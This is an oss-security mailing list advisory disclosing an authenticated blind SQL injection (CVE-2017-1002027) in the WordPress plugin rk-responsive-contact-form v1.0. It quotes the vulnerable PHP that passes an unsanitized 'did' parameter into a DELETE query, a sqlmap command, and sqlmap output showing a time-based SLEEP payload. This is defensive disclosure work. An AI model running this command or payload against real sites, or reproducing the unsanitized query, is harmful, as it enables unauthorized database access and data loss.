'[oss-security] Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-con'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-con
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-08-23 12:22:07
Message-ID: CEF95F5A-B021-4514-867B-64B38D7CFBF3 () me ! com
[Download RAW message or body]

Title: Authenticated Blind SQL Injection vulnerability in Wordpress plugin \
                rk-responsive-contact-form v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-01
CVE-ID:[CVE-2017-1002027]
Download Site: https://wordpress.org/plugins/rk-responsive-contact-form/
Vendor: rkdevelopers
Vendor Notified: 2017-08-05
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=198
Description: A simple WordPress plugin that generates a responsive contact form on your website \
or blog Vulnerability:
The variable $delid isn't sanitized before being passed into an SQL query in file \
./rk-responsive-contact-form/include/rk_user_list.php :

1-<?php 
2-	global $wpdb;
3-	$table_name = $wpdb->prefix . "rk_contact";
4:	$info=$_GET["info"];
5-	if($info=="del")
6-	{
7:	$delid=$_GET["did"];
8-	
9-	$wpdb->query("delete from ".$table_name." where `user_id`=".$delid);
10-	echo "<div style='clear:both;'></div><div class='updated' \
id='message'><p><strong>:".__('User Record Deleted.','rkcontactform')."</strong>.</p></div>"; \
11-	} 12-?>

The attacker must have permission to modify contacts in order to exploit this vulnerability.

Exploit Code:
	• $ sqlmap -u 'http://example.com/wp-admin/admin.php?page=rk_user_lists&info=del&did=*' \
--load-cookies=./cookie.txt --level=2 --risk=1 --dbms=mysql   •  
	•  
	• URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
	• sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests:
	• ---
	• Parameter: #1* (URI)
	•   Type: AND/OR time-based blind
	•   Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•   Payload: http://example.com:80/wp-admin/admin.php?page=rk_user_lists&info=del&did=(CASE \
WHEN (6363=6363) THEN SLEEP(5) ELSE 6363 END)  • ---
	• [10:57:22] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [10:57:22] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/example.com'  •  
	• [*] shutting down at 10:57:22=


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic